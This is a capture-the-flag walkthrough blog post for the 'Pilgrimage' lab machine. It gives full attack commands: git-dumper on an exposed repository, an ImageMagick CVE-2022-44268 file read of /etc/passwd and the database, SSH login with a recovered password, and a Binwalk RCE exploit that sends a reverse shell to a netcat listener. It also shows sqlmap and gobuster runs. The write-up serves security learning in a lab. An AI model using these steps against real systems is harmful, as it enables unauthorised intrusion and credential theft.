The Be Sure Blog

Port scan first:

sudo nmap -sCV 10.10.11.219

Relevant output:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open  http    nginx 1.18.0
|_http-title: Pilgrimage - Shrink Your Images
| http-git:
|   10.10.11.219:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: Pilgrimage image shrinking service initial commit. # Please ...
|_http-server-header: nginx/1.18.0
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Very interesting! We see: "Git repository found!" But before we get to that, we paste the server IP into our browser and realize that no website is loaded, even if we get forwarded to the URL:

http://pilgrimage.htb/

Something seems configured wrongly. So we will try to modify our local hosts file and see if that fixes the issue:

sudo nano /etc/hosts

Below the 127. addresses, add:

10.10.11.219    pilgrimage.htb

Then hit ctrl + o and enter to save, and then ctrl + x to close the editor. When refreshing the website in the browser, we now get a website:

Save space and shrink it!
A free online image shrinker. Create an account to save your images!

Instead of inspecting this website's frontend, let's check if we can obtain the Git repository first. We will use the tool git-dumper to download it.

sudo pip install git-dumper
git-dumper http://pilgrimage.htb/.git/ git

It worked!

cd git
ls

Outputs:

assets dashboard.php index.php login.php logout.php magick register.php vendor

When inspecting the PHP code of index.php, we can see how to image upload of the website works:

• the server gets a POST request
• if an image is provided, the code to shrink and save it gets executed
• the final upload path is "http://pilgrimage.htb/shrunk"
• we can also see that ImageMagick is used to do the resizing

To find out if this program is vulnerable, we run

./magick -version

Relevant output:

Version: ImageMagick 7.1.0-49

And indeed, this version is vulnerable to Arbitrary File Read. Let's follow the steps provided by Voidz0r (https://github.com/voidz0r/CVE-2022-44268):

git clone https://github.com/voidz0r/CVE-2022-44268
cd CVE-2022-44268
cargo run "/etc/passwd"
convert image.png -resize 50% output.png

Then we upload the file "output.png" via the website file upload. A link is displayed, which we click on and download the image to our system:

http://pilgrimage.htb/shrunk/64d67aba91b5c.png

Then we run:

identify -verbose 64d67aba91b5c.png

Relevant output:

Raw profile type:
726f6f743a783a303a303a726f6f743a2f726f6f743a2f62696e2f626173680a6461656d
6f6e3a783a313a313a6461656d6f6e3a2f7573722f7362696e3a2f7573722f7362696e2f
6e6f6c6f67696e0a62696e3a783a323a323a62696e3a2f62696e3a2f7573722f7362696e
2f6e6f6c6f67696e0a7379733a783a333a333a7379733a2f6465763a2f7573722f736269
6e2f6e6f6c6f67696e0a73796e633a783a343a36353533343a73796e633a2f62696e3a2f
62696e2f73796e630a67616d65733a783a353a36303a67616d65733a2f7573722f67616d
65733a2f7573722f7362696e2f6e6f6c6f67696e0a6d616e3a783a363a31323a6d616e3a
2f7661722f63616368652f6d616e3a2f7573722f7362696e2f6e6f6c6f67696e0a6c703a
783a373a373a6c703a2f7661722f73706f6f6c2f6c70643a2f7573722f7362696e2f6e6f
6c6f67696e0a6d61696c3a783a383a383a6d61696c3a2f7661722f6d61696c3a2f757372
2f7362696e2f6e6f6c6f67696e0a6e6577733a783a393a393a6e6577733a2f7661722f73
706f6f6c2f6e6577733a2f7573722f7362696e2f6e6f6c6f67696e0a757563703a783a31
303a31303a757563703a2f7661722f73706f6f6c2f757563703a2f7573722f7362696e2f
6e6f6c6f67696e0a70726f78793a783a31333a31333a70726f78793a2f62696e3a2f7573
722f7362696e2f6e6f6c6f67696e0a7777772d646174613a783a33333a33333a7777772d
646174613a2f7661722f7777773a2f7573722f7362696e2f6e6f6c6f67696e0a6261636b
75703a783a33343a33343a6261636b75703a2f7661722f6261636b7570733a2f7573722f
7362696e2f6e6f6c6f67696e0a6c6973743a783a33383a33383a4d61696c696e67204c69
7374204d616e616765723a2f7661722f6c6973743a2f7573722f7362696e2f6e6f6c6f67
696e0a6972633a783a33393a33393a697263643a2f72756e2f697263643a2f7573722f73
62696e2f6e6f6c6f67696e0a676e6174733a783a34313a34313a476e617473204275672d
5265706f7274696e672053797374656d202861646d696e293a2f7661722f6c69622f676e
6174733a2f7573722f7362696e2f6e6f6c6f67696e0a6e6f626f64793a783a3635353334
3a36353533343a6e6f626f64793a2f6e6f6e6578697374656e743a2f7573722f7362696e
2f6e6f6c6f67696e0a5f6170743a783a3130303a36353533343a3a2f6e6f6e6578697374
656e743a2f7573722f7362696e2f6e6f6c6f67696e0a73797374656d642d6e6574776f72
6b3a783a3130313a3130323a73797374656d64204e6574776f726b204d616e6167656d65
6e742c2c2c3a2f72756e2f73797374656d643a2f7573722f7362696e2f6e6f6c6f67696e
0a73797374656d642d7265736f6c76653a783a3130323a3130333a73797374656d642052
65736f6c7665722c2c2c3a2f72756e2f73797374656d643a2f7573722f7362696e2f6e6f
6c6f67696e0a6d6573736167656275733a783a3130333a3130393a3a2f6e6f6e65786973
74656e743a2f7573722f7362696e2f6e6f6c6f67696e0a73797374656d642d74696d6573
796e633a783a3130343a3131303a73797374656d642054696d652053796e6368726f6e69
7a6174696f6e2c2c2c3a2f72756e2f73797374656d643a2f7573722f7362696e2f6e6f6c
6f67696e0a656d696c793a783a313030303a313030303a656d696c792c2c2c3a2f686f6d
652f656d696c793a2f62696e2f626173680a73797374656d642d636f726564756d703a78
3a3939393a3939393a73797374656d6420436f72652044756d7065723a2f3a2f7573722f
7362696e2f6e6f6c6f67696e0a737368643a783a3130353a36353533343a3a2f72756e2f
737368643a2f7573722f7362696e2f6e6f6c6f67696e0a5f6c617572656c3a783a393938
3a3939383a3a2f7661722f6c6f672f6c617572656c3a2f62696e2f66616c73650a

Let's convert that!

Paste the hexadecimal encoded code into a file called "hex.txt". Then run this command to make it human readable:

xxd -r -p hex.txt > decoded_hex.txt
cat decoded_hex.txt

Outputs:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
emily:x:1000:1000:emily,,,:/home/emily:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
_laurel:x:998:998::/var/log/laurel:/bin/false

We see, that an user named "emily" is existent. From our previous enumeration, we know that the website is using a SQLite database. The name is

/var/db/pilgrimage

So we create another .png file:

cargo run "/var/db/pilgrimage"

And upload this via the website. Then we repeat the above steps of downloading the processed image and analyzing it.

convert image.png -resize 50% output.png

Upload the file output.png, then download the resized image from the website and run:

identify -verbose 64d67aba91b5c.png

This time the value of "Raw profile type" is much larger. Copy it all, paste it into a file and convert it, so we can read it:

sudo nano hex2.txt
xxd -r -p hex2.txt > decoded_hex2.txt
cat decoded_hex2.txt 

Relevant output:

abigchonkyboi123

Since port 22 (SSH) is open on the server, we try this credentials now:

ssh emily@10.10.11.219
password: abigchonkyboi123

Success!

cat user.txt

Time for privilege escalation. When checking the returned data for the command:

ps -aux

We find one interesting thing:

root        652 0.0 0.0  6816 2376 ?       S   01:18  0:00 /bin/bash /usr/sbin/malwarescan.sh

We can view the content of this bash script:

cat /usr/sbin/malwarescan.sh

Returns:

!/bin/bash
blacklist=("Executable script" "Microsoft executable")
/usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/ | while read FILE; do
        filename="/var/www/pilgrimage.htb/shrunk/$(/usr/bin/echo "$FILE" | /usr/bin/tail -n 1 | /usr/bin/sed -n -e 's/^.*CREATE //p')"
        binout="$(/usr/local/bin/binwalk -e "$filename")"
        for banned in "${blacklist[@]}"; do
                if [[ "$binout" == *"$banned"* ]]; then
                        /usr/bin/rm "$filename"
                        break
                fi
        done
done

The script runs when a new image is put into the directory /shrunk. It uses the tool Binwalk to check for malware.

binwalk

Reveals:

Binwalk v2.3.2

This version is vulnerable to Remote Command Execution (RCE)! In the Exploit Database (link below) we find a script to exploit the vulnerability.

mkdir temp
cd temp
sudo nano exploit.py

Copy the code into the file, then save and exit it. Then run this code (with your machines IP address and any port):

touch exp.png
python3 exploit.py exp.png 10.10.15.5 1337

A file named binwalk_exploit.png is created.

Then open a new console and start a Netcat listener on the port you specified above:

netcat -lvnp 1337

Now upload the binwalk_exploit.png file via SCP to the /shrunk directory:

scp binwalk_exploit.png emily@10.10.11.219:/var/www/pilgrimage.htb/shrunk/

And as the server is configured, the file will be handled and out Netcat listener receives the reverse shell!

cd ~
cat root.txt

Done!

The following attempts did not help, but are a honorable mention for other projects:

Testing for SQL-Injection

We can create a new account with any credentials it seems:

User name: test
Password: test

Let's check if we receive an user cookie, that we can edit to try SQL-Injection. We use the Firefox add-on "Cookie-Editor" (https://addons.mozilla.org/en-US/firefox/addon/cookie-editor/). When logged in, the add-on show us:

Name: PHPSESSID
Value: a6fm0i6d6js3oe0ksil89an83m

We will now use the tool sqlmap with the above name/value pair:

sqlmap -u "http://pilgrimage.htb/dashboard.php" --cookie="PHPSESSID=a6fm0i6d6js3oe0ksil89an83m"

Use GoBuster to find all pages

gobuster dir --url http://pilgrimage.htb/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html

Reveals:

/.html               (Status: 403) [Size: 153]
/index.php           (Status: 200) [Size: 7621]
/login.php           (Status: 200) [Size: 6166]
/register.php        (Status: 200) [Size: 6173]
/assets              (Status: 301) [Size: 169] [--> http://pilgrimage.htb/assets/]
/logout.php          (Status: 302) [Size: 0] [--> /]
/vendor              (Status: 301) [Size: 169] [--> http://pilgrimage.htb/vendor/]
/dashboard.php       (Status: 302) [Size: 0] [--> /login.php]
/tmp                 (Status: 301) [Size: 169] [--> http://pilgrimage.htb/tmp/]
/.html               (Status: 403) [Size: 153]